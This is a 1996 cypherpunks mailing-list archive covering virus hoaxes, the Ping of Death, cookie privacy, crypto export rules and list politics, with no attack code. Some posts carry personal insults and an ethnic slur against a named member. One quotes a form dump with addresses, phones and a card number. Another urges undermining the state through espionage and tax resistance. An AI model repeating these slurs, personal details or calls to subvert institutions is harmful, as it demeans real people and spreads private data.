                          /       |     /_\   /
                          \___  __|__  /   \  \___
             __________________________________________________________

                             INFORMATION BULLETIN

            Internet Hoaxes: PKZ300, Irina, Good Times, Deeyenda, Ghost

November 20, 1996 15:00 GMT                                       
Number H-05
______________________________________________________________________________
PROBLEM:       This bulletin addresses the following hoaxes and
erroneous 
               warnings: PKZ300 Warning, Irina, Good Times, Deeyenda,
and 
               Ghost.exe
PLATFORM:      All, via e-mail
DAMAGE:        Time lost reading and responding to the messages
SOLUTION:      Pass unvalidated warnings only to your computer security 
               department or incident response team. See below on how to 
               recognize validated and unvalidated warnings and hoaxes.
______________________________________________________________________________
VULNERABILITY  New hoaxes and warnings have appeared on the Internet and
old 
ASSESSMENT:    hoaxes are still being cirulated.
______________________________________________________________________________

 <snip>  <snip>  <snip>  <snip>  <snip>  <snip>  <snip>  <snip>  <snip> 
<snip> 

Good Times Virus Hoax
=====================

The "Good Times" virus warnings are a hoax. There is no virus by that
name in 
existence today. These warnings have been circulating the Internet for
years. 
The user community must become aware that it is unlikely that a virus
can be 
constructed to behave in the manner ascribed in the "Good Times" virus 
warning. For more information related to this urban legend, reference
CIAC 
Notes 95-09.

http://ciac.llnl.gov/ciac/notes/Notes09.shtml

 <snip>  <snip>  <snip>  <snip>  <snip>  <snip>  <snip>  <snip>  <snip> 
<snip> 

john





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Johnson <toto@sk.sympatico.ca>
Date: Wed, 18 Dec 1996 01:14:02 -0800 (PST)
To: cypherpunks@toad.com
Subject: Pretty Lousy Privacy
In-Reply-To: <1.5.4.32.19961217131004.006a82e4@pop.pipeline.com>
Message-ID: <32B7D1F3.538A@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


TOTO Enterprises is proud to announce the release of their latest product, PLP/Pretty 
Lousy Privacy.

   PLP allows the user to send messages purporting to be encrypted but, in fact, 
containing no encryption, whatsoever.  This will allow God-and-everybody to read all of 
your 'secret' missives.
 
   Got something you promised not to tell anyone, but you just can't keep a secret?  Use 
PLP, and claim astonishment that someone 'broke the code'.
   Feeling like a loser, because nobody reads your eMail?  Use PLP and excite the 
imaginations of busybodies everywhere.
   Got competition for that job promotion?  Send a nasty chain-letter about the boss 
using your competitor's name and PLP, and you can start breaking out the champagne the 
minute you hit Send.
   Work at the White House?  No need to explain, just use PLP and those late-night 
meetings in underground parking garages will be a thing of the past.

   Impressed?
   Just listen to what Dr.Dimitri Vulis KOTM has to say about PLP:
   "Best encryption program going.  You can bet your sweet ass that that murdering 
Armenian bastard, Ray Arachelian, didn't write it."

   Yes, the secret is out -- PLP/Pretty Lousy Programming is nothing you'd expect, and 
less, in the latest encryption technology.
   And the best part is, you can export PLP without a license. (We checked with the 
janitor at the Federal Building, and he thought it would be OK.)

  So start using PLP today, and let 'everyone' know about the cypherpunks 
secret plot against Dr.Dimitri Vulis KOTM.
-- 
Reply to:toto@sk.sympatico.ca
"There's only one two."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Johnson <toto@sk.sympatico.ca>
Date: Wed, 18 Dec 1996 02:02:14 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: WARNING: VIRUS: [Was: Re: Encryption to the poors]
In-Reply-To: <3.0.32.19961217132851.00c9ee90@pop.firefly.net>
Message-ID: <32B7D488.B6B@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


Alexander Chislenko wrote:
> The last message from Fuck@yourself.up contained a dirBomb
> virus as an attachment; file name GREETS.COM
> Make sure you don't execute it.

Good idea.
I made that mistake when I got eMail from ThisIs@A.Bomb.
What could I have been thinking?
-- 
Reply to:toto@sk.sympatico.ca
"There's only one two."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamie@comet.net (jamie dyer)
Date: Wed, 18 Dec 1996 00:43:45 -0800 (PST)
To: Blake Coverett <blake@bcdev.com>
Subject: RE: Ping of Death?
In-Reply-To: <01BBEC65.8DA20C00@bcdev.com>
Message-ID: <Pine.BSF.3.95.961218034141.15593F-100000@atlas.comet.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 17 Dec 1996, Blake Coverett wrote:

->> Anyone heard of the Ping of Death, aka the Ping Bomb. It's a large chunk of
->> hostile code, disguised as a mere ping, that can lead to server rebooting.
->
->> Technology Assignment Editor, Wired News, http://www.wired.com/
->> Producer, Packet, http://www.packet.com/
->
->I read the two parts above and shake my head...
->A 'technology assignment editor' that has missed 
->this story till now, and can't use a search engine 
->to boot?
->-Blake (who should only look at the pictures)
 
 Aw heck, give the little fellers at Wired a break.
It's awful time consuming being on the cutting edge.


jamie
------------------------------------------------------------------------------
jamie@comet.net |          Comet.Net		|  Send empty message 
		|     Charlottesville, Va.  	|  to pgpkey@comet.net 
		|        (804)295-2407		|  for pgp public key.
	        |     http://www.comet.net	|
"When buying and selling are controlled by legislation, the first things
to be bought and sold are legislators"  -P.J. O'Rourke. 
------------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mr. Peabody" <peabody@nym.alias.net>
Date: Wed, 18 Dec 1996 00:54:41 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Netscape binary identification
Message-ID: <199612180854.DAA09387@anon.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hi folks, I've got a Netscape binary here that I need help identifying. Is
it the domestic or international version, and which one is it? The md5sum
is: e989f71f75a86f0eb3da61e9bf511b35 g32d301p.exe       Thanks! 

-Peabody





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Johnson <toto@sk.sympatico.ca>
Date: Wed, 18 Dec 1996 02:02:17 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Test Only  / Thanks
In-Reply-To: <199612180421.UAA11164@toad.com>
Message-ID: <32B7DB98.4E65@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


Say Bob,
  Thanks for that MasterCard Number.  I'm going to need some new clothes 
when I go for my parole hearing, and it'll sure help out.
   Are you using that new encryption technology, PLP/Pretty Lousy 
Privacy?
Thanks,
  Toto
-- 
Reply to:toto@sk.sympatico.ca
"There's only one two."

Bob. R. Roberts wrote:
> 
> The following form contents were entered on 18th Dec 96
> Date = 18 Dec 96 04:18:56
> subject = Test only, sorry, NOISE, do not read
> resulturl = http://www.netmart.com/steppingstones/thanks.html
> uname = Bob. R. Roberts
> email = bob@jail.sg
> Address = 4625 E. Elm Drive
> Apartment or suite = 14
> CITY = Chula Vista
> STATE/PROVINCE = Oklahoma
> country = USA
> zip = 01238
> phone = 407-251-1701
> work phone = 407-352-1702
> FAX = 407-453-1703
> ship to name = Mary M. Roberts
> ship to email = mary@aol.gov
> ship toAddress = 14207 Broadway NE
> ship to Apartment or suite = 600
> ship to CITY = Janesville
> ship to STATE/PROVINCE = Texas
> ship to country = USA
> ship to zip = 95442
> Book = My Dinosaur Adventure
> first name = Freddie
> middle name = Jurgen
> last name = Robertson
> nickname = Goober
> age = 6
> hometown = Hickville
> gender = Boy
> dedication = grow up, punk
> book from = Gran & Grump
> Date Book = 12/4/95
> Friend#1 = Muffy
> Friend#2 = Scooter
> Friend#3 = Slim
> Child's Birthday = 2/1/91
> Baby's name = Grinder
> Baby's gender = Boy
> How did you hear? = E-Mail
> Invitation # = none
> Mastercard  = on
> call = on
> credit card number = 251-4444-25713-591-3
> credit card name = Richard Q. Nickson
> expiraion date = 8/22/98






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@alpha.jpunix.com>
Date: Wed, 18 Dec 1996 03:49:08 -0800 (PST)
To: Mixmaster Mailing List <alt.privacy@myriad.alias.net
Subject: New type2.list/pubring.mix
Message-ID: <Pine.NEB.3.93.961218054447.13361A-100000@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello Everyone,

	There is an updated type2.list/pubring.mix combination on
jpunix.com. The update reflects the retirement of the jam remailer. The
files are available by WWW from www.jpunix.com as well as by anonymous ftp
from ftp.jpunix.com. Maybe jam ought to run a middleman? :)

 John Perry KG5RG perry@alpha.jpunix.com PGP-encrypted e-mail welcome!
 Amateur Radio Address: kg5rg@kg5rg.ampr.org
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@alpha.jpunix.com>
Date: Wed, 18 Dec 1996 03:56:02 -0800 (PST)
To: Mixmaster Mailing List <cypherpunks@toad.com>
Subject: New type2.list/pubring.mix
Message-ID: <Pine.NEB.3.93.961218055238.13361B-100000@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Everyone,

	There is an updated type2.list/pubring.mix combination on
jpunix.com. The update reflects the retirement of the jam remailer. The
files are available by WWW from www.jpunix.com as well as by anonymous ftp
from ftp.jpunix.com. Maybe jam ought to run a middleman? :)

ONE MORE TIME!! I didn't get enough coffee yet!!

Oops. Here it is signed.

 John Perry KG5RG perry@alpha.jpunix.com PGP-encrypted e-mail welcome!
 Amateur Radio Address: kg5rg@kg5rg.ampr.org
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMrfbu1OTpEThrthvAQFchAQApJzyapWlVKf+SSyuckhgKKPnE7JWPxjy
iMHZ+yCwBSA/dIC2cqH2kjwg8mZEARSeu4nnwZ8bfJQJLyphk9TFjB1aeUzcCvZf
B694KttgMK+oT4unW2MSmRzub3OIddUSuFEB/G1V7gaxDepPWWNT3YlI3nuYI+HW
1MCp7YhSNko=
=wKrB
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: geeman@best.com
Date: Wed, 18 Dec 1996 07:29:41 -0800 (PST)
To: Marc Horowitz <cypherpunks@toad.com
Subject: Re: [NOT NOISE] Microsoft Crypto Service Provider API
Message-ID: <3.0.32.19961218073206.006b691c@best.com>
MIME-Version: 1.0
Content-Type: text/plain



Microsoft had to agree to validate crypto binaries against
a signature to make sure they weren't tampered with, in 
exchange for shipping crypto-with-a-hole.  They will
sign anything (theoretically) if it has the export
papers and all.  Or without, if you affadavit it is not
for export.

They do not themselves impose any restrictions on crypto
strength.

I'm not expressing political position here, just conveying facts ....

At 01:13 AM 12/18/96 -0500, Marc Horowitz wrote:
>roy@sendai.scytale.com (Roy M. Silvernail) writes:
>
>>> I just got my copy of the Microsoft Cryptographic Service Provider
>>> Development Kit, Version 1.0.  It appears to support only Windows NT.  A
>>> first glance reveals no built-in GAK (but I haven't examined it closely
>>> yet!).
>
>You're right, you haven't looked at it closely.  Although it doesn't
>have Key Escrow, new cryptosystems can only be added if they are
>signed by a private key held by Microsoft.  Of course, Microsoft has
>agreed with the State Dept. to sign only export-"strength" crypto.
>
>		Marc
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 18 Dec 1996 06:42:01 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The virus I got...
In-Reply-To: <961218000243_34679065@emout12.mail.aol.com>
Message-ID: <msV5yD4w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


AwakenToMe@aol.com writes:

> Uh..... My question is WHO in gods name trusts a uuencoded file that small
> especially from an address like that. Sounds like stupidity to me...

Yes - unbelievable stupidity is one of the distinguishing features of the
"cypher punks", together with ignorance and racism.

And these idiots rant about not trusting signed apples.

He he he.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 18 Dec 1996 05:41:45 -0800 (PST)
To: cypherpunks@toad.com
Subject: MSNBC on Crypto End Run
Message-ID: <1.5.4.32.19961218133809.006a8c98@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


http://www.msnbc.com/news/46551.asp

"Scaling the encryption-policy wall: Companies make
end run around U.S. restrictions on cryptography"

A good report on why US companies are going overseas
for strong crypto. With numerous crypto links.

"It's a huge gaping hole in the efforts to control strong 
cryptography, and it's going to get bigger," says Douglas 
Barnes, vice president of Oakland, Calif.-based C2Net 
Software, a privately held company at the forefront of 
those circumventing the U.S. policy.

-----

We've mirrored it at:

http://jya.com/endrun.htm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Juliet Travis <jtravis@alexander-pr.com>
Date: Wed, 18 Dec 1996 08:43:34 -0800 (PST)
To: cypherpunks@toad.com
Subject: REMOVE
Message-ID: <s2b7b524.052@alexander-pr.com>
MIME-Version: 1.0
Content-Type: text/plain







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@tivoli.com>
Date: Wed, 18 Dec 1996 07:10:22 -0800 (PST)
To: vipul@pobox.com
Subject: Re: NSClean
In-Reply-To: <199612181422.OAA00228@fountainhead.net>
Message-ID: <32B80925.5BB0@tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Vipul Ved Prakash wrote:
> 
> *** NSCLean, IECLean provide privacy for surfers
> 
> Heightened awareness of cookies ...

I see complaints about cookies all the time, and I just have to
wonder why the fuss seems so relatively, well, unsophisticated,
for lack of a better word.

The cookie idea, in and of itself, is really a pretty good one and
can provide some useful features.  Things like auto-configuring
web sites ("my Yahoo", though I don't know for sure how that works)
can exploit the cookie capability to provide convenience.  I just
can't get worked up over it.  The cookie issuer still doesn't really
know who the visitor is, of course, unless the visitor explicitly
hands over that information.

"Naughty" uses of cookies for tracking sites visited might be
objectionable, I suppose.  It's easy enough to do selective
editing of the cookie file of course (maybe this NSClean product
can do that).

One of the scary things might be that though cookies can be made
hard to forge, it's clearly impossible for cookie issuers to 
ensure the cookies aren't stolen or deliberately distributed.  If
a site uses a "secure" cookie as a means of identifying the web
visitor, there's certainly some risk if it then allows access to
sensitive information.


-- 
^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^
Mike McNally -- Egregiously Pointy -- Tivoli Systems, "IBM" -- Austin
mailto:m5@tivoli.com    mailto:m101@io.com    http://www.io.com/~m101
^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 18 Dec 1996 07:24:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: WARNING: VIRUS: [Was: Re: Encryption to the poors]
In-Reply-To: <32B7D488.B6B@sk.sympatico.ca>
Message-ID: <HkZ5yD6w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Carl Johnson <toto@sk.sympatico.ca> writes:
> Alexander Chislenko wrote:
> > The last message from Fuck@yourself.up contained a dirBomb
> > virus as an attachment; file name GREETS.COM
> > Make sure you don't execute it.
>
> Good idea.
> I made that mistake when I got eMail from ThisIs@A.Bomb.
> What could I have been thinking?

You were probably thinking that cryptography is "kewl" and that any
juvenile computer nerd can use fancy phrases like "brute force attacks
on one-time pads" without understanding what he's talking about and
sound as "kewl" as Paul Bradley.  Right?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Wed, 18 Dec 1996 09:35:18 -0800 (PST)
To: m5@vail.tivoli.com
Subject: Re: NSClean
In-Reply-To: <32B80925.5BB0@tivoli.com>
Message-ID: <199612181733.JAA30032@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


Mike McNally writes:
 
 
> I see complaints about cookies all the time, and I just have to
> wonder why the fuss seems so relatively, well, unsophisticated,
> for lack of a better word.

Probably because cookies aren't explained well to the 'lay public'.

> The cookie idea, in and of itself, is really a pretty good one and
> can provide some useful features.

Yep, it's a good alternative to stuffing a cookie in the URL and
running everything through a CGI script.

The objection I have with cookies are that they can be used to pass
information between servers.  And they're being used to track where
browsers go (see http://www.doubleclick.com for an example, theyre
not the only people doing this).

> "Naughty" uses of cookies for tracking sites visited might be
> objectionable, I suppose.  It's easy enough to do selective
> editing of the cookie file of course (maybe this NSClean product
> can do that).

Editing the cookie file doesn't have any effect while the browser is running.
You could visit one Doubleclick-infested site and get one of their
cookies then go to another infested site in the same session.

A better method is to be able to selectively accept/send cookies from
certain sites while blocking them from others.  As it happens
I've written a program that does that.  See
http://www.lne.com/ericm/cookie_jar.  It's still got some bugs
but it generally works ok.  Note that you need access to
a unix shell and perl to run it.

It would be even better if browser writers added similar features to their
browsers.  My program is a kludge.

> One of the scary things might be that though cookies can be made
> hard to forge, it's clearly impossible for cookie issuers to 
> ensure the cookies aren't stolen or deliberately distributed.  If
> a site uses a "secure" cookie as a means of identifying the web
> visitor, there's certainly some risk if it then allows access to
> sensitive information.

Servers in that position would encrypt the data sent in cookie, no?

-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 18 Dec 1996 07:24:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Pretty Lousy Privacy
In-Reply-To: <32B7D1F3.538A@sk.sympatico.ca>
Message-ID: <1NZ5yD7w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Carl Johnson <toto@sk.sympatico.ca> writes:
>    Just listen to what Dr.Dimitri Vulis KOTM has to say about PLP:
>    "Best encryption program going.  You can bet your sweet ass that that murdering
> Armenian bastard, Ray Arachelian, didn't write it."

The genocide of 2,500,000 Moslems (mostly women and children) by Armenians
during this century's "ethnic cleansings" alone is nothing to laugh about.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@tivoli.com>
Date: Wed, 18 Dec 1996 08:07:09 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Java DES cracker
Message-ID: <32B813B7.199@tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Metin Feridun wrote:
> 
> Hi Mike,
> 
> We had talked about using the Internet as a supercomputer last August.
> Check out the following article in the January issue of JavaWorld:
> 
>         http://www.javaworld.com/javaworld/jw-01-1997/jw-01-dampp.html
> 
> Regards,
> 
> Metin

-- 
^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^
Mike McNally -- Egregiously Pointy -- Tivoli Systems, "IBM" -- Austin
mailto:m5@tivoli.com    mailto:m101@io.com    http://www.io.com/~m101
^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Wed, 18 Dec 1996 07:24:09 -0800 (PST)
To: Law &amp; Policy of Computer Communications <cypherpunks@toad.com>
Subject: Computer Programs as Text
Message-ID: <199612181521.KAA17456@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain



I wrote a little article on Understanding Computers and the Law for my
class in Computers and the Law.  The major theme of this article is
the importance of distinguishing between computer programs as text
and computer programs as functional processes.  

That theme is also a central issue in the suit that I am bringing to
enjoin the enforcement of the cryptographic portions of the ITAR as
they apply to software.

I intend to expand the article and ultmately submit it for publication
in a law journal but in the meantime I have posted an html version on
my web server.  The URL is <http://samsara.law.cwru.edu/comp_law/why1.html>.  

This draft need considerably more work on the last two sections (and I
have to include the illustrations, which are a couple of pictures from
Alice in Wonderland).  But I am making it availabele in this
pre-publication form because it may have some insights that some of
you might find interesting and because I am interested in your
reactions and insights.  I especially would like to hear from real
programmers who view their programs as ``works of authorship'' (and
from those who don't).  That is not only important as an academic
matter; if we can get the courts to recognize that programs as written
and communicated are texts much like other texts, it will be difficult
to deny them the full protection of the first amendment.

Ciao,
Peter
--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu
		     URL:  http://samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Electric Library <elibrary@INFONAUTICS.COM>
Date: Wed, 18 Dec 1996 10:13:23 -0800 (PST)
To: Elibrary Friend <elibrary@INFONAUTICS.COM>
Subject: Electric Library Gift Idea
Message-ID: <199612181812.KAA25818@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


** Special Holiday offer to Electric Library Trial Users and Customers **

Purchase a 6 month gift subscription for only $39.95, save more than 30%!!
--------------------------------------------------------------------------

Are you looking for the perfect last minute holiday gift?  Now you can give an
Electric Library Gift Subscription to the entire family, a friend or your
favorite student! Why give one book or magazine when you can give thousands of
full-text newspapers and magazines, extensive photo archives, complete
encyclopedias, and more!

This great cybergift includes 6 months of unlimited access to the most complete
reference library online. Our special holiday offer is a terrific value, at only
$39.95, over 30% off of the regular price! And, it is fully guaranteed.

To give an Electric Library Gift Subscription online simply place your order and
then print a stylish gift certificate - or - choose from our selection of
electronic gift packages. Be the first to give a cybergift online! Preview the
gift certificates and wrapping options by connecting to http://www.cardsandgifts.com.

The online Gift Center is open around the clock (except from 4am-7am EST).
The Electric Library Gift Subscription is a limited time offer and available for
new subscriptions only.

Please visit http://www.cardsandgifts.com for more information.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 18 Dec 1996 07:37:47 -0800 (PST)
To: cypherpunks@toad.com
Subject: Parolees Can't Possess Crypto
Message-ID: <3.0.1.32.19961218104243.00720110@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


The new federal parole guidelines that will ban some cons from the nets
will also ban them from posessing crypto software which will also make
virtually any computer use impossible.  "Main Justice" does say that with
the Klinton Admins plans for universal access counter this proposal since
the cons will have access at schools, libraries, etc. (not to mention
Internet Cafes).

DCF

   





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SUCRUM22_at_INDY-ADP@smtp-gw.cv62.navy.mil
Date: Tue, 17 Dec 1996 18:45:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: Maybe the CypherPunks *do* have some heart
Message-ID: <9611188509.AA850936189@smtp-gw.cv62.navy.mil>
MIME-Version: 1.0
Content-Type: text/plain


 
 ------------------ Begin Forwarded Message Text --------------------- 
 The Houghton-Mifflin Publishing Co.. is giving books to children's 
 hospitals; how many books they give depends on how many emails they 
 receive from people around the world.  For every 25 emails they 
 receive, they give one book -- it seems like a great way to 
 help a good cause. All you have to do is mail:     share@hmco.com. 
 Hope you can spare some time to write and then let your friends know. 
 ------------------- End Forwarded Message Text ---------------------- 
 
 Hey cypherpunks, just thought this might be of interest, forgive the 
 spam, but remember, knowledge begins with reading.  And no, don't go  
 e-mail and ask what books the Co. is donating (i.e.. gov't supportive, 
 procrypto controls etc etc) Its the Holidays, have some heart.  And 
 hey - if the number of books is related to the number of e-mails, i 
 wonder if maybe we can enlist those "i'm sorry" spammers to fill those 
 e-mail boxes <grin>.  Happy <whatever-you-happen-to-celebrate>.  
 
 ---------------------- SUCRUM22@cv62.navy.mil ----------------------- 
 Don't confuse my views with those of the DoD or the United States Navy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 18 Dec 1996 11:17:01 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Cypherpunks as Philosopher Kings
In-Reply-To: <199612181741.KAA25446@infowest.com>
Message-ID: <v03007800aeddef15b550@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



My closing line of this post is "When Cypherpunks are viewed as
"terrorists," we will have done our jobs." So, if this viewpoint offends
you, delete this message now. If you don't understand the context of this
point, you may be a newbie, or a "warez dood," and should probably delete
this message and go back to asking for some new kewl viruses (perhaps on
another, more suitable, forum). If you understand the context, but agree or
disagree, then of course we can discuss it.

At 4:36 PM +0000 12/18/96, attila@primenet.com wrote:

>        Currently, I am not sure what the charter of cypherpunks
>    really stands for, if anything.  As it stands, the list has
>    a far more erudite group than the list it probably should be.
>    certainly more privacy and social engineering issues resulting
>    from the deprivation of privacy than code.

The "charter" is mostly contained in the "welcome message" all subscribers
receive. And further elaborations, as Attila of course knows (but maybe
some others don't) are fleshed out in the essays we write, the material
formerly at the csua/cypherpunks ftp site (I'm not sure it's still there,
as it's been a long time since I looked), etc,

I agree that "programming" per se was never the focus. Even in the early
days, when the remailers were written by E. Hughes and H. Finney, there was
essentially zero discussion of the details of the Perl and/or C
code...which is not surprising, as the number of people conversant in
Perl--and interested at the time the discussion happens--is usally a small
number. Maybe 5 people on the list back then could've meaningfully spent
time looking at the Perl code and discussing it. As I said, this is hardly
surprising.

Instead, a wider audience is reached by--and participates in--debates about
the overall structure of remailers, the role of latency/accumulation, and
so on. (I'm just picking remailers as an example.)

Is this "coding"? In a sense, of course it is. And the design criteria
overlap with politico-legal discussions, e.g., of the need for
extra-jurisdictional remailers, the need for large numbers of them, the
advisability of various types of remailer syntax, etc.

Keeping with this particular example, not that the remailer operators have
their own mailing list to discuss details of current remailer software,
issues of blocking, etc.

Add to this list other such lists, such as "pgp-dev" and the various crypto
lists, and sci.crypt, and sci.crypt.research, and "coderpunks," and this is
why I have very little sympathy when people chime in saying discussion of
digital cash and crypto anarchy have "no place" on this list (Cypherpunks),
that the list is "for coding." Nonsense.

(Oh, and there's now Perry's new list. And filtered lists. And on and on.)

What's making the list almost unreadable for me today are the noisy posts
from newcomers ("doodz, like here are some warez!"), spammers ("make money
fast"), insulters ("John Gilmore (fart) is a Sovok apparatchnik"), and
unsubscribers {who can't spell and who never seem to read the instructions
sent to them).

>        I don't believe Cypherpunks was ever intended to be a technical
>    forum; I was not on for the first few months so I missed the
>    formative discussions of the elitist few, most of whom, other than
>    founder tcmay, have left for greener pastures.

Well, if the early list activists were Eric Hughes, Hugh Daniel, John
Gilmore, and me, only Eric and I were heavy posters in the first months and
years. John and Hugh were always low-volume, off doing other things, or not
primarily interested in the debate on the mailing list. So, only Eric has
moved off to other things.

But so have a lot of folks....look at the active posters from the first
year. Then the second year. And the third. And the fourth. Lots of changes
in names. As expected. People say what they want to say, and hear the same
points a bunch of times. And lots of list members have gotten
crypto-related jobs...the list is very long. (I'm not claiming that they
got the jobs because of our list, but it is interesting the extent to which
list members have found work in crypto and security areas.)

>        For what it's worth, the above is my perception of cypherpunks:
>    an interesting collection of philosopher kings, some of whom are
>    putting their convictions to the means of thwarting the common
>    enemy.  It is no accident most subscribers, and certainly all the
>    doers, are anti-government with a preference for social anarchy,
>    the anarchy tempered by some level of realization that the mass
>    of humanity can not govern itself in a society which is inherently
>    evil. However, if the Libertarian Party can not field a better
>    candidate than Harry Brown, anarchy, or a premature dictatorship,
>    it will be.  The US is in the last laugh of the oligarchy at this
>    point in time.

Being that I think _democracy_ is our number one problem, I'm not at all
surprised that the Libertarian Party is foundering (and floundering, too
:-}). Harry Browne, the best candidate ever (and I voted for the first LP
candidate, John Hospers, in 1972--yes, 1972), got less of the vote this
time around than the past several (weaker) candidates. Oh well. Not
suprising.

_Direct action_ is what it's all about. Undermining the state through the
spread of espionage networks, through undermining faith in the tax system,
through even more direct applications of the right tools at the right times.

When Cypherpunks are called "terrorists," we will have done our jobs.

--Tim May

Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Genocide <gen2600@aracnet.com>
Date: Wed, 18 Dec 1996 11:35:21 -0800 (PST)
To: Eric Murray <ericm@lne.com>
Subject: Re: Ping of Death?
In-Reply-To: <199612172317.PAA22019@slack.lne.com>
Message-ID: <Pine.LNX.3.95.961218112912.24125A-100000@shelob.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 17 Dec 1996, Eric Murray wrote:

> > Anyone heard of the Ping of Death, aka the Ping Bomb. It's a large chunk of
> > hostile code, disguised as a mere ping, that can lead to server rebooting.
> 
> It would be quite a trick to get an OS to run code from inside
> a ping packet.  Are you sure this isn't the well-known giant ping packet bug?
> Receiving one or more of those can cause some hosts to reboot.
> 
	I believe you are referring to the oversized ping packet...

     I've gotten a helluva lot of mail on this since I started up my web
